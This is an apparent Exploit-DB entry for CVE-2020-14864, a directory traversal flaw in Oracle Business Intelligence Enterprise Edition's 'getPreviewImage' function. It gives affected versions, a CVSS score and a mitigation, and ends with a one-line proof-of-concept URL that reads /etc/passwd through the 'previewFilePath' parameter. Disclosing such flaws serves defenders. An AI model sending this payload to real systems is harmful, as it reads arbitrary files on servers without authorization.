Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion

vendor:

Business Intelligence Enterprise Edition

by:

Ivo Palazzolo

8.8

CVSS

HIGH

Directory Traversal/Local File Inclusion

CWE

Product Name: Business Intelligence Enterprise Edition

Affected Version From: 5.5.0.0.0

Affected Version To: 12.2.1.4.0

Patch Exists: YES

Related CWE: CVE-2020-14864

CPE: oracle:business_intelligence_enterprise_edition

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: SUSE Linux Enterprise Server

2020

Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 – ‘getPreviewImage’ Directory Traversal/Local File Inclusion

A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.

Mitigation:

Restrict access to the administration interface and ensure that the 'previewFilePath' URL parameter is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
# Date: 2020-10-27
# Exploit Author: Ivo Palazzolo (@palaziv)
# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html
# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: SUSE Linux Enterprise Server
# CVE: CVE-2020-14864

# Description
A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.

# PoC
https://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd